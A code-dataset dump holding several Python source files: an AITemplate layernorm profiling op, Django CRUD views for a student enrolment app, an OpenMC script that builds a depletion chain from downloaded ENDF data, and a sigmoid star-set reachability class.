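# back into integers; the ranged form guards the compiled kernel at runtime.
import re

def gen_exec_key(name_values):
    parts = []
    for name, values in name_values.items():
        if len(values) == 1:
            parts.append(f"{name} == {values[0]}")
        else:
            parts.append(f"{name} >= {values[0]} && {name} <= {values[-1]}")
    return " && ".join(parts)

def invert_exec_key(key):
    # Mirrors the op's splitter: only equality clauses yield numeric tokens.
    return [int(tok) for tok in re.split(" == | && ", key) if tok.isnumeric()]

profiling_key = gen_exec_key({"M": [1024], "N": [512]})
exec_cond = gen_exec_key({"M": [1, 1024], "N": [512]})
print(profiling_key)                   # 'M == 1024 && N == 512'
print(exec_cond)                       # 'M >= 1 && M <= 1024 && N == 512'
print(invert_exec_key(profiling_key))  # [1024, 512]
```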
to profile\n a dynamic range, an upper bound will be used.\n \"\"\"\n assert (\n len(self._attrs[\"normalized_shape\"]) == 1\n ), \"For profiling, normalized_shape must be 1D\"\n\n m_max = 1\n m_min = 1\n for dim in self._attrs[\"inputs\"][0]._attrs[\"shape\"][:-1]:\n m_max *= max(dim._attrs[\"values\"])\n m_min *= min(dim._attrs[\"values\"])\n\n n = self._attrs[\"inputs\"][0]._attrs[\"shape\"][-1].value()\n\n shape_values_dict = {\n \"M\": [m_min, m_max],\n \"N\": [n],\n }\n\n self._attrs[\"exec_path\"] = OrderedDict()\n if dynamic_profiling_strategy == DynamicProfileStrategy.MAX:\n max_values = {\"M\": [m_max], \"N\": [n]}\n\n exec_item = ExecItem(\n profiling_key=self._gen_exec_key(max_values),\n exec_cond=self._gen_exec_key(shape_values_dict),\n algo=\"\",\n )\n self._attrs[\"exec_path\"][exec_item.profiling_key] = exec_item\n elif dynamic_profiling_strategy == DynamicProfileStrategy.MIN:\n min_values = {\"M\": [m_min], \"N\": [n]}\n exec_item = ExecItem(\n profiling_key=self._gen_exec_key(min_values),\n exec_cond=self._gen_exec_key(shape_values_dict),\n algo=\"\",\n )\n self._attrs[\"exec_path\"][exec_item.profiling_key] = exec_item\n\n def _gen_profile_cmd(self, profiler_prefix, cfg, x_shape):\n \"\"\"Generate profiler command.\n\n Parameters\n ----------\n profiler_prefix : str\n Directory to store profiler.\n cfg: str\n The filename generated for profiler.\n x_shape : List[int]\n Input shapes for the profiler.\n \"\"\"\n exe_path = os.path.join(profiler_prefix, cfg)\n if not os.access(exe_path, os.X_OK):\n raise RuntimeError(\"Profiler %s is not executable\" % exe_path)\n cmd = [exe_path]\n for shape in x_shape:\n cmd.append(shape)\n command = [str(x) for x in cmd]\n return command\n\n def _profile_single_workload(self, profiler_prefix, exec_key, devices):\n \"\"\"Profile a single workload.\n\n Parameters\n ----------\n profiler_prefix : str\n Base dir to keep profiling source codes.\n exec_key: str\n Input arguments to profiler executables.\n devices: List[int]\n GPU device ids used for profiling.\n \"\"\"\n target = backend.target.Target.current()\n # if in CI just choose minimal configs\n # workspace is a hack just provides 102400 Byte\n # query cache\n tmp_key = next(iter(self._attrs[\"op_instance\"].keys()))\n tmp_op = self._attrs[\"op_instance\"][tmp_key]\n exec_entry_sha1 = sha1(exec_key.encode(\"utf-8\")).hexdigest()\n query = NormQueryEntry(\n dtype_in=tmp_op.In.value,\n dtype_acc=tmp_op.accumulator_type().value,\n dtype_out=tmp_op.Out.value,\n rank=tmp_op.Rank,\n op_type=self._attrs[\"op\"],\n device=target._arch,\n exec_entry_sha1=exec_entry_sha1,\n )\n cache_value = target.query_profile_cache(\"normalization\", query.__dict__)\n if cache_value is not None and not target.force_profile():\n _LOGGER.info(\"Load profiling result from cache.\")\n return cache_value\n\n content = list(self._attrs[\"op_instance\"].keys())\n runner = backend.profiler_runner.Runner(devices, self._attrs[\"name\"])\n x_shape = self._invert_exec_key(exec_key)\n for cfg in content:\n command = self._gen_profile_cmd(profiler_prefix, cfg, x_shape)\n runner.push(cfg, command)\n\n runner.join()\n result = runner.pull()\n\n if len(result) == 0:\n raise RuntimeError(\n \"Profile workload: \" f\"{exec_key}\" \" failed. 
\" f\"Results: {result}.\"\n )\n\n out = min(result, key=itemgetter(1))\n best_algo = out[0]\n workspace = out[1].workspace\n ## cache\n cache_record = NormRecordEntry(\n exec_entry=exec_key,\n exec_entry_sha1=exec_entry_sha1,\n dtype_in=tmp_op.In.value,\n dtype_acc=tmp_op.accumulator_type().value,\n dtype_out=tmp_op.Out.value,\n rank=tmp_op.Rank,\n op_type=self._attrs[\"op\"],\n device=target._arch,\n algo=best_algo,\n workspace=workspace,\n )\n Target.current().insert_profile_cache(\"normalization\", cache_record.__dict__)\n return (best_algo, workspace)\n\n def profile(\n self,\n workdir=\"./\",\n devices=None,\n dynamic_profiling_strategy=DynamicProfileStrategy.MAX,\n ):\n \"\"\"Selects the fastest kernel configurations.\n\n Parameters\n ----------\n workdir : str, optional\n Base dir to keep profiling source codes, by default \"./\"\n devices: list, optional\n Devices used for profiling, by default device 0 will be used.\n dynamic_profiling_strategy: DynamicProfileStrategy, optional\n A dynamic profiling strategy. By default MAX is used, i.e. to profile\n a dynamic range, an upper bound will be used.\n \"\"\"\n\n if devices is None:\n devices = [0]\n\n self._extract_exec_path(dynamic_profiling_strategy)\n\n workloads = list(self._attrs[\"exec_path\"].keys())\n profiler_prefix = os.path.join(workdir, \"profiler\", self._attrs[\"op\"])\n if \"op_instance\" not in self._attrs:\n target = backend.target.Target.current()\n # init candidate ops\n func_key = \"{target}.{op}.config\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n func(self._attrs)\n\n for wkl in workloads:\n _LOGGER.info(\n \"Profile: {name}: {wkl}\".format(name=self._attrs[\"name\"], wkl=wkl),\n )\n best_algo, workspace = self._profile_single_workload(\n profiler_prefix, wkl, devices\n )\n self._attrs[\"exec_path\"][wkl].algo = best_algo\n self._attrs[\"workspace\"] = workspace\n\n def gen_profiler(\n self,\n workdir: str = None,\n dynamic_profiling_strategy=DynamicProfileStrategy.HINTS,\n ) -> None:\n \"\"\"Generator profiler. 
The profiler files are standalone executable for profiling.\n\n Parameters\n ----------\n workdir : str, optional\n Base dir to keep profiling source codes, by default \"./\"\n dynamic_profiling_strategy: DynamicProfileStrategy, optional\n A dynamic profiling strategy, used to filter generated profiles at compile time.\n See also: :func:`~aitemplate.compiler.transform.profile.profile`\n \"\"\"\n target = Target.current()\n # init candidate ops\n func_key = \"{target}.{op}.config\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n func(self._attrs)\n func_key = \"{target}.{op}.gen_profiler\".format(\n target=target.name(), op=self._attrs[\"op\"]\n )\n func = registry.get(func_key)\n return func(self._attrs, workdir)\n\n def _get_op_attributes(self):\n return {\"normalized_shape\": self._attrs[\"default_normalized_shape\"]}\n\n def _args_for_pseudo_code(self):\n return [\n f\"normalized_shape={[s.symbolic_value() for s in self._attrs['normalized_shape']]}\"\n ]\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/compiler/ops/layernorm/layernorm.py","file_name":"layernorm.py","file_ext":"py","file_size_in_byte":15986,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"11687736590","text":"from django.shortcuts import render,redirect\nfrom .forms import Form_Crear, Form_Materia, Form_Modificar_A, Form_Modificar_M\nfrom .models import Alumno, Materia\nfrom django.contrib import messages\n# Create your views here.\n\n\ndef listar(request):\n\tmateria = Materia.objects.all()\n\talumno = Alumno.objects.all()\n\tcontext = {\n\t\t'alumno':alumno,\n\t\t'materia':materia,\n\t}\n\n\treturn render(request,'listar.html',context)\n\ndef crear_alumno(request):\n\tf = Form_Crear(request.POST or None)\n\tcontext ={\n\t\t\"form\":f,\n\t}\n\n\tif f.is_valid():\n\t\tdatos_form = f.cleaned_data\n\t\talumno = Alumno()\n\t\talumno.nombre = datos_form.get(\"nombre\")\n\t\talumno.apellido = datos_form.get(\"apellido\")\n\t\talumno.cedula = datos_form.get(\"cedula\")\n\t\talumno.telefono = datos_form.get(\"telefono\")\n\t\talumno.correo \t = datos_form.get(\"correo\")\n\t\talumno.direccion = datos_form.get(\"direccion\")\n\t\talumno.save()\n\n\t\tif(alumno.save() != True):\n\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha podido crear el Alumno\", fail_silently=True)\n\t\telse:\t\n\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha creado un nuevo Alumno\", fail_silently=True)\n\t\treturn redirect('/matricula')\n\tcontext ={\n\t\t\"form\":f,\n\t}\n\treturn render(request,'crear_alumno.html',context)\n\ndef crear_materias(request):\n\tf = Form_Materia(request.POST or None)\n\tcontext = {\n\t\t\"form\":f,\n\t}\n\n\tif f.is_valid():\n\t\tdatos_form \t\t\t\t= f.cleaned_data\n\t\tmateria \t\t\t\t= Materia()\n\t\tmateria.nombre \t\t\t= datos_form.get(\"nombre\")\n\t\tmateria.horas \t\t\t= datos_form.get(\"horas\")\n\t\tmateria.creditos \t\t= datos_form.get(\"creditos\")\n\t\tmateria.numcupos \t\t= datos_form.get(\"numcupos\")\n\t\tmateria.num_Estudiantes = datos_form.get(\"num_Estudiantes\")\n\t\tmateria.save()\n\n\t\tif(materia.save() != True):\n\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha podido crear la Materia\", fail_silently=True)\n\t\telse:\t\n\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha creado una nueva Materia\", fail_silently=True)\n\t\treturn redirect('/matricula')\n\tcontext ={\n\t\t\"form\":f,\n\t}\n\treturn 
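A note on the Django views above: `Model.save()` returns `None`, so checks such as `if alumno.save() != True` always take the failure branch, and the object is also saved twice (once before the check and once inside it). A corrected sketch of the create view's pattern, assuming the form's field names match the model's, as the original assignments suggest:

```python
# Hedged sketch of the create view with the save/flash logic fixed: branch
# on a database error instead of on save()'s return value (always None).
from django.contrib import messages
from django.db import DatabaseError
from django.shortcuts import redirect, render

from .forms import Form_Crear
from .models import Alumno

def crear_alumno(request):
    f = Form_Crear(request.POST or None)
    if f.is_valid():
        alumno = Alumno(**f.cleaned_data)   # field names match the model's
        try:
            alumno.save()                   # save exactly once
        except DatabaseError:
            messages.error(request, "No se ha podido crear el Alumno")
        else:
            messages.success(request, "Se ha creado un nuevo Alumno")
        return redirect("/matricula")
    return render(request, "crear_alumno.html", {"form": f})
```

The same `!= True` / double-save pattern recurs in the modify and delete views (`alumno.delete()` does return a tuple, but the materia/alumno save checks are inverted in the same way).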
render(request,'crear_materia.html',context)\n\ndef eliminar_alumno(request):\n\talumno = Alumno.objects.get(cedula=request.GET['cedula'])\n\tcontext = {\n\t\t'alumno':alumno,\n\t}\n\treturn render(request,'eliminar_alumno.html',context)\n\ndef confirmacion_eliminar(request):\n\talumno = Alumno.objects.get(cedula=request.GET['cedula'])\n\tif (alumno.delete()):\n\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha eliminado el alumno\", fail_silently=True)\n\telse: \n\t\tmessages.add_message(request, messages.ERROR, \"No se ha eliminado el alumno\", fail_silently=True)\n\treturn redirect(listar)\n\ndef modificar_alumno(request):\n\talumno = Alumno.objects.get(cedula=request.GET['cedula'])\n\tf = Form_Modificar_A(request.POST or None)\n\tcontext = {\n\t\t'alumno':alumno,\n\t\t'form':f,\n\t}\n\tf.fields['nombre'].initial\t = alumno.nombre\n\tf.fields['apellido'].initial = alumno.apellido\n\tf.fields['cedula'].initial \t = alumno.cedula\n\tf.fields['telefono'].initial = alumno.telefono\n\tf.fields['correo'].initial \t = alumno.correo\n\tf.fields['direccion'].initial= alumno.direccion\n\n\tif request.method == 'POST':\n\t\tif f.is_valid():\n\t\t\tf_data = f.cleaned_data\n\t\t\talumno.nombre \t= f_data.get('nombre')\n\t\t\talumno.apellido = f_data.get('apellido')\n\t\t\talumno.cedula \t= f_data.get('cedula')\n\t\t\talumno.telefono = f_data.get('telefono')\n\t\t\talumno.correo\t= f_data.get('correo')\n\t\t\talumno.direccion= f_data.get('direccion')\n\t\t\tif (alumno.save()):\n\t\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha modificado el alumno\", fail_silently=True)\n\t\t\telse:\t\n\t\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha modificado el alumno\", fail_silently=True)\n\t\t\treturn redirect(listar)\n\n\treturn render(request,'modificar_alumno.html',context)\n\ndef eliminar_materia(request):\n\tmateria = Materia.objects.get(nombre=request.GET['nombre'])\n\tcontext = {\n\t\t'materia':materia,\n\t}\n\treturn render(request,'eliminar_materia.html',context)\n\ndef confirmacion_eliminar_materia(request):\n\tmateria = Materia.objects.get(nombre=request.GET['nombre'])\n\tif (materia.delete()):\n\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha eliminado la materia\", fail_silently=True)\n\telse: \n\t\tmessages.add_message(request, messages.ERROR, \"No se ha eliminado la materia\", fail_silently=True)\n\treturn redirect(listar)\n\ndef modificar_materia(request):\n\tmateria = Materia.objects.get(nombre=request.GET['nombre'])\n\tf = Form_Modificar_M(request.POST or None)\n\tcontext = {\n\t\t'materia':materia,\n\t\t'form':f,\n\t}\n\tf.fields['nombre'].initial\t \t\t= materia.nombre\n\tf.fields['horas'].initial \t\t\t= materia.horas\n\tf.fields['creditos'].initial \t\t= materia.creditos\n\tf.fields['numcupos'].initial \t\t= materia.numcupos\n\tf.fields['num_Estudiantes'].initial = materia.num_Estudiantes\n\n\tif request.method == 'POST':\n\t\tif f.is_valid():\n\t\t\tf_data = f.cleaned_data\n\t\t\tmateria.nombre \t\t\t= f_data.get('nombre')\n\t\t\tmateria.horas \t\t\t= f_data.get('horas')\n\t\t\tmateria.creditos \t\t= f_data.get('creditos')\n\t\t\tmateria.numcupos \t\t= f_data.get('numcupos')\n\t\t\tmateria.num_Estudiantes\t= f_data.get('num_Estudiantes')\n\t\t\tif (materia.save()):\n\t\t\t\tmessages.add_message(request, messages.ERROR, \"No se ha modificado el materia\", fail_silently=True)\n\t\t\telse:\t\n\t\t\t\tmessages.add_message(request, messages.SUCCESS, \"Se ha modificado el materia\", fail_silently=True)\n\t\t\treturn redirect(listar)\n\n\treturn 
render(request,'modificar_materia.html',context)\n\n","repo_name":"npmcdn-to-unpkg-bot/Practica_matricula","sub_path":"repaso/matricula/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75005402407","text":"#!/usr/bin/env python3\n\nimport glob\nimport os\nfrom zipfile import ZipFile\nfrom collections import OrderedDict, defaultdict\nfrom io import StringIO\nfrom itertools import chain\n\ntry:\n import lxml.etree as ET\n _have_lxml = True\nexcept ImportError:\n import xml.etree.ElementTree as ET\n _have_lxml = False\n\nimport openmc.data\nimport openmc.deplete\nfrom openmc._xml import clean_indentation\nfrom openmc.deplete.chain import REACTIONS, replace_missing_fpy\nfrom openmc.deplete.nuclide import Nuclide, DecayTuple, ReactionTuple, \\\n FissionYieldDistribution\n\nfrom casl_chain import CASL_CHAIN, UNMODIFIED_DECAY_BR\nfrom utils import download\n\nURLS = [\n 'https://www.nndc.bnl.gov/endf-b7.1/zips/ENDF-B-VII.1-neutrons.zip',\n 'https://www.nndc.bnl.gov/endf-b7.1/zips/ENDF-B-VII.1-decay.zip',\n 'https://www.nndc.bnl.gov/endf-b7.1/zips/ENDF-B-VII.1-nfy.zip'\n]\n\n\ndef replace_missing_decay_product(product, decay_data, all_decay_data):\n # Determine atomic number, mass number, and metastable state\n Z, A, state = openmc.data.zam(product)\n symbol = openmc.data.ATOMIC_SYMBOL[Z]\n\n # Iterate until we find an existing nuclide in the chain\n while product not in decay_data:\n # If product has no decay data in the library, nothing further can be done\n if product not in all_decay_data:\n product = None\n break\n\n # If the current product is not in the chain but is stable, there's\n # nothing further we can do. Also, we only want to continue down the\n # decay chain if the half-life is short, so we also make a cutoff here\n # to terminate if the half-life is more than 1 day.\n decay_obj = all_decay_data[product]\n if decay_obj.nuclide['stable'] or decay_obj.half_life.n > 24*60*60:\n product = None\n break\n\n dominant_mode = max(decay_obj.modes, key=lambda x: x.branching_ratio)\n product = dominant_mode.daughter\n\n return product\n\n\ndef main():\n if os.path.isdir('./decay') and os.path.isdir('./nfy') and os.path.isdir('./neutrons'):\n endf_dir = '.'\n elif 'OPENMC_ENDF_DATA' in os.environ:\n endf_dir = os.environ['OPENMC_ENDF_DATA']\n else:\n for url in URLS:\n basename = download(url)\n with ZipFile(basename, 'r') as zf:\n print('Extracting {}...'.format(basename))\n zf.extractall()\n endf_dir = '.'\n\n decay_files = glob.glob(os.path.join(endf_dir, 'decay', '*.endf'))\n fpy_files = glob.glob(os.path.join(endf_dir, 'nfy', '*.endf'))\n neutron_files = glob.glob(os.path.join(endf_dir, 'neutrons', '*.endf'))\n\n # Create a Chain\n chain = openmc.deplete.Chain()\n\n print('Reading ENDF nuclear data from \"{}\"...'.format(os.path.abspath(endf_dir)))\n\n # Create dictionary mapping target to filename\n print('Processing neutron sub-library files...')\n reactions = {}\n for f in neutron_files:\n evaluation = openmc.data.endf.Evaluation(f)\n nuc_name = evaluation.gnd_name\n if nuc_name in CASL_CHAIN:\n reactions[nuc_name] = {}\n for mf, mt, nc, mod in evaluation.reaction_list:\n # Q value for each reaction is given in MF=3\n if mf == 3:\n file_obj = StringIO(evaluation.section[3, mt])\n openmc.data.endf.get_head_record(file_obj)\n q_value = openmc.data.endf.get_cont_record(file_obj)[1]\n reactions[nuc_name][mt] = q_value\n\n # Determine what decay and FPY 
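`replace_missing_decay_product` above walks a missing reaction product down its dominant decay mode until reaching a nuclide the chain actually tracks, giving up on stable or long-lived (over one day) intermediates. The same logic on toy data:

```python
# Hedged sketch of the decay-chain walk on made-up nuclides: follow the
# dominant decay mode until a tracked nuclide is found, or bail out.
DAY = 24 * 60 * 60

# toy decay table: name -> (stable, half_life_s, dominant_daughter)
DECAY = {
    "A1": (False, 2.0, "A2"),      # seconds-lived, decays to A2
    "A2": (False, 60.0, "A3"),
    "A3": (False, 5 * DAY, "A4"),  # too long-lived to keep walking through
}
CHAIN = {"A3"}                     # nuclides actually tracked in the chain

def replace_missing(product):
    while product not in CHAIN:
        if product not in DECAY:
            return None            # no decay data at all: drop the branch
        stable, t_half, daughter = DECAY[product]
        if stable or t_half > DAY:
            return None            # cannot shortcut through long-lived nuclides
        product = daughter
    return product

print(replace_missing("A1"))   # 'A3': walked A1 -> A2 -> A3
print(replace_missing("A3"))   # 'A3': already in the chain
```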
nuclides are available\n print('Processing decay sub-library files...')\n decay_data = {}\n all_decay_data = {}\n for f in decay_files:\n decay_obj = openmc.data.Decay(f)\n nuc_name = decay_obj.nuclide['name']\n all_decay_data[nuc_name] = decay_obj\n if nuc_name in CASL_CHAIN:\n decay_data[nuc_name] = decay_obj\n\n for nuc_name in CASL_CHAIN:\n if nuc_name not in decay_data:\n print('WARNING: {} has no decay data!'.format(nuc_name))\n\n print('Processing fission product yield sub-library files...')\n fpy_data = {}\n for f in fpy_files:\n fpy_obj = openmc.data.FissionProductYields(f)\n name = fpy_obj.nuclide['name']\n if name in CASL_CHAIN:\n fpy_data[name] = fpy_obj\n\n print('Creating depletion_chain...')\n missing_daughter = []\n missing_rx_product = []\n missing_fpy = []\n\n for idx, parent in enumerate(sorted(decay_data, key=openmc.data.zam)):\n data = decay_data[parent]\n\n nuclide = Nuclide(parent)\n\n chain.nuclides.append(nuclide)\n chain.nuclide_dict[parent] = idx\n\n if not CASL_CHAIN[parent][0] and \\\n not data.nuclide['stable'] and data.half_life.nominal_value != 0.0:\n nuclide.half_life = data.half_life.nominal_value\n nuclide.decay_energy = data.decay_energy.nominal_value\n nuclide.sources = data.sources\n sum_br = 0.0\n for mode in data.modes:\n decay_type = ','.join(mode.modes)\n if mode.daughter in decay_data:\n target = mode.daughter\n else:\n missing_daughter.append((parent, mode))\n continue\n\n # Append decay mode\n br = mode.branching_ratio.nominal_value\n nuclide.add_decay_mode(decay_type, target, br)\n\n # Ensure sum of branching ratios is unity by slightly modifying last\n # value if necessary\n sum_br = sum(m.branching_ratio for m in nuclide.decay_modes)\n if sum_br != 1.0 and nuclide.decay_modes and parent not in UNMODIFIED_DECAY_BR:\n decay_type, target, br = nuclide.decay_modes.pop()\n br = 1.0 - sum(m.branching_ratio for m in nuclide.decay_modes)\n nuclide.add_decay_mode(decay_type, target, br)\n\n # If nuclide has incident neutron data, we need to list what\n # transmutation reactions are possible\n fissionable = False\n transmutation_reactions = ('(n,2n)', '(n,3n)', '(n,4n)', '(n,gamma)',\n '(n,p)', '(n,a)')\n if parent in reactions:\n reactions_available = reactions[parent].keys()\n for name in transmutation_reactions:\n mts, changes, _ = REACTIONS[name]\n if mts & reactions_available:\n delta_A, delta_Z = changes\n A = data.nuclide['mass_number'] + delta_A\n Z = data.nuclide['atomic_number'] + delta_Z\n daughter = '{}{}'.format(openmc.data.ATOMIC_SYMBOL[Z], A)\n\n if daughter not in decay_data:\n daughter = replace_missing_decay_product(\n daughter, decay_data, all_decay_data)\n if daughter is None:\n missing_rx_product.append((parent, name, daughter))\n\n # Store Q value -- use sorted order so we get summation\n # reactions (e.g., MT=103) first\n for mt in sorted(mts):\n if mt in reactions[parent]:\n q_value = reactions[parent][mt]\n break\n else:\n q_value = 0.0\n\n nuclide.add_reaction(name, daughter, q_value, 1.0)\n\n # Check for fission reactions\n if any(mt in reactions_available for mt in [18, 19, 20, 21, 38]):\n q_value = reactions[parent][18]\n nuclide.add_reaction('fission', None, q_value, 1.0)\n fissionable = True\n\n if fissionable:\n if parent in fpy_data:\n fpy = fpy_data[parent]\n else:\n nuclide._fpy = replace_missing_fpy(parent, fpy_data, decay_data)\n missing_fpy.append((parent, nuclide._fpy))\n continue\n\n if fpy.energies is not None:\n yield_energies = fpy.energies\n else:\n yield_energies = [0.0]\n\n yield_data = {}\n for E, 
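Because evaluated decay data rarely sums to exactly 1, the chain builder above re-derives the last branching ratio from the others (skipping nuclides listed in `UNMODIFIED_DECAY_BR`). A toy illustration with made-up ratios:

```python
# Hedged sketch of the branching-ratio clean-up with toy numbers: the last
# mode's ratio is replaced by 1 minus the sum of the remaining modes.
modes = [("beta-", "Xe135", 0.9999), ("beta-,n", "Xe134", 0.00012)]  # toy values

total = sum(br for _, _, br in modes)
if modes and total != 1.0:
    decay_type, target, _ = modes.pop()
    modes.append((decay_type, target, 1.0 - sum(br for _, _, br in modes)))

print(modes)                         # last ratio re-derived from the others
print(sum(br for *_, br in modes))   # now sums to exactly 1.0
```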
table_yd, table_yc in zip(yield_energies, fpy.independent, fpy.cumulative):\n yields = defaultdict(float)\n for product in table_yd:\n if product in decay_data:\n # identifier\n ifpy = CASL_CHAIN[product][2]\n # 1 for independent\n if ifpy == 1:\n if product not in table_yd:\n print('No independent fission yields found for {} in {}'.format(product, parent))\n else:\n yields[product] += table_yd[product].nominal_value\n # 2 for cumulative\n elif ifpy == 2:\n if product not in table_yc:\n print('No cumulative fission yields found for {} in {}'.format(product, parent))\n else:\n yields[product] += table_yc[product].nominal_value\n # 3 for special treatment with weight fractions\n elif ifpy == 3:\n for name_i, weight_i, ifpy_i in CASL_CHAIN[product][3]:\n if name_i not in table_yd:\n print('No fission yields found for {} in {}'.format(name_i, parent))\n else:\n if ifpy_i == 1:\n yields[product] += weight_i * table_yd[name_i].nominal_value\n elif ifpy_i == 2:\n yields[product] += weight_i * table_yc[name_i].nominal_value\n\n yield_data[E] = yields\n\n nuclide.yield_data = FissionYieldDistribution(yield_data)\n\n # Replace missing FPY data\n for nuclide in chain.nuclides:\n if hasattr(nuclide, '_fpy'):\n nuclide.yield_data = chain[nuclide._fpy].yield_data\n\n # Display warnings\n if missing_daughter:\n print('The following decay modes have daughters with no decay data:')\n for parent, mode in missing_daughter:\n print(' {} -> {} ({})'.format(parent, mode.daughter, ','.join(mode.modes)))\n print('')\n\n if missing_rx_product:\n print('The following reaction products have no decay data:')\n for vals in missing_rx_product:\n print('{} {} -> {}'.format(*vals))\n print('')\n\n if missing_fpy:\n print('The following fissionable nuclides have no fission product yields:')\n for parent, replacement in missing_fpy:\n print(' {}, replaced with {}'.format(parent, replacement))\n print('')\n\n chain.export_to_xml('chain_casl.xml')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"openmc-dev/data","sub_path":"depletion/generate_endf71_chain_casl.py","file_name":"generate_endf71_chain_casl.py","file_ext":"py","file_size_in_byte":10999,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"53"} +{"seq_id":"23046665047","text":"#!/usr/bin/python3\nimport numpy as np\n\nclass LogSig:\n # LogSig class contains method for reachability analysis for Layer with\n # Sigmoid activation function.\n # Reference: https://www.mathworks.com/help/deeplearning/ref/logsig.html\n\n def evaluate(x):\n return 1 / (1 + np.exp(-x)) # np.exp(-np.logaddexp(0, -x)) check if it is more accurate\n\n # main method\n def reach_star_approx(I, # input star set\n method = 'approx-star-no-split', # reach star approximate method \n relaxFactor = 0, # for relaxed approx-star method\n disp_opt = '', # display option\n lp_solver = 'gurobi'): # lp solver option\n from engine.set.star import Star\n \n assert isinstance(I, Star), 'error: input set is not a star set'\n\n if method == 'approx-star-no-split' or method == 'approx-star':\n if relaxFactor == 0:\n S = LogSig.multiStepLogSig_NoSplit(I, disp_opt, lp_solver)\n else:\n S = LogSig.relaxedMultiStepLogSig_NoSplit(I, relaxFactor, disp_opt, lp_solver)\n elif method == 'approx-star-split':\n S = LogSig.reach_star_approx_split(I)\n else:\n raise Exception('error: unkown reachability method')\n return S\n\n#------------------check if this function is working--------------------------------------------\n # reachability method with star\n # def 
reach_star_approx_split(I):\n\n    #------------------check if this function is working--------------------------------------------\n    # def stepLogSig_Split(I, index):\n\n    # multiStepLogSig at one\n    def multiStepLogSig_NoSplit(I, disp_opt = '', lp_solver = 'gurobi'):\n        # @I: input star set\n        # @l: l = min(x[index]), lower bound at neuron x[index]\n        # @u: u = max(x[index]), upper bound at neuron x[index]\n        # @yl: yl = logsig(l), output of logsig at lower bound\n        # @yu: yu = logsig(u), output of logsig at upper bound\n        # @dyl: derivative of LogSig at the lower bound\n        # @dyu: derivative of LogSig at the upper bound\n        # return: output star set\n        from engine.set.star import Star\n\n        assert isinstance(I, Star), 'error: input set is not a star'\n\n        N = I.dim\n        inds = np.array(range(N))\n        disp = disp_opt == 'display'\n        if disp:\n            print('\\nComputing lower-bounds: ')\n        l = I.getMins(inds, '', disp_opt, lp_solver)\n        if disp:\n            print('\\nComputing upper-bounds: ')\n        u = I.getMaxs(inds, '', disp_opt, lp_solver)\n\n        yl = LogSig.evaluate(l)\n        yu = LogSig.evaluate(u)\n        dyl = yl * (1 - yl)\n        dyu = yu * (1 - yu)\n\n        # l ~= u\n        map2 = np.argwhere(l.flatten() != u.flatten())\n        m = len(map2)\n        V2 = np.zeros((N,m))\n        for i in range(m):\n            V2[map2[i], i] = 1\n\n        # new basis matrix\n        new_V = np.hstack((np.zeros((N, I.nVar+1)), V2))\n\n        # l == u\n        map1 = np.argwhere(l.flatten() == u.flatten())\n        if len(map1):\n            yl1 = yl[map1]\n            new_V[map1, 0] = yl1\n            new_V[map1, 1:I.nVar+1+m] = 0\n\n        # add new constraints\n\n        # C0, d0\n        n = I.C.shape[0]\n        C0 = np.hstack((I.C, np.zeros((n,m))))\n        d0 = I.d\n\n        nv = I.nVar+1\n\n        # C1, d1, x >= 0\n        # constraint 1: y <= y'(l) * (x - l) + y(l)\n        # constraint 2: y <= y'(u) * (x - u) + y(u) \n        # constraint 3: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n        map1 = np.argwhere((l.flatten() >= 0) & (l.flatten() != u.flatten()))\n        if len(map1):\n            a = yl[map1]\n            b = yu[map1]\n            da = dyl[map1]\n            db = dyu[map1]\n            # constraint 1: y <= y'(l) * (x - l) + y(l)\n            C11 = np.hstack((np.multiply(-da, I.V[map1, 1:nv]), V2[map1, :]))\n            d11 = np.multiply(da, I.V[map1, 0] - l[map1]) + a\n            # constraint 2: y <= y'(u) * (x - u) + y(u)\n            C12 = np.hstack((np.multiply(-db, I.V[map1, 1:nv]), V2[map1, :]))\n            d12 = np.multiply(db, I.V[map1, 0] - u[map1]) + b\n            # constraint 3: y >= (y(u) - y(l)) * (x - l) / (u - l) + y(l)\n            gamma = (b-a)/(u[map1] - l[map1])\n            C13 = np.hstack((np.multiply(gamma, I.V[map1, 1:nv]), -V2[map1, :]))\n            d13 = np.multiply(-gamma, I.V[map1, 0] - l[map1]) - a\n\n            C1 = np.vstack((C11, C12, C13))\n            d1 = np.vstack((d11, d12, d13))\n        else:\n            C1 = np.empty((0, nv+1))\n            d1 = np.empty((0, 1))\n\n        # C2, d2, x <= 0\n        # y is concave when x <= 0\n        # constraint 1: y >= y'(l) * (x - l) + y(l)\n        # constraint 2: y >= y'(u) * (x - u) + y(u)\n        # constraint 3: y <= (y(u) - y(l)) * (x -l) / (u - l) + y(l)\n        map1 = np.argwhere((u.flatten() <= 0) & (l.flatten() != u.flatten()))\n        if len(map1):\n            a = yl[map1]\n            b = yu[map1]\n            da = dyl[map1]\n            db = dyu[map1]\n            # constraint 1: y >= y'(l) * (x - l) + y(l)\n            C21 = np.hstack((np.multiply(da, I.V[map1, 1:nv]), -V2[map1, :]))\n            d21 = np.multiply(-da, I.V[map1, 0]-l[map1]) - a\n            # constraint 2: y >= y'(u) * (x - u) + y(u)\n            C22 = np.hstack((np.multiply(db, I.V[map1, 1:nv]), -V2[map1, :]))\n            d22 = np.multiply(-db, I.V[map1, 0]-u[map1]) - b\n            # constraint 3: y <= (y(u) - y(l)) * (x -l) / (u - l) + y(l)\n            gamma = (b-a)/(u[map1] - l[map1])\n            C23 = np.hstack((np.multiply(-gamma, I.V[map1, 1:nv]), V2[map1, :]))\n            d23 = np.multiply(gamma, I.V[map1, 0]-l[map1]) + a\n\n            C2 = 
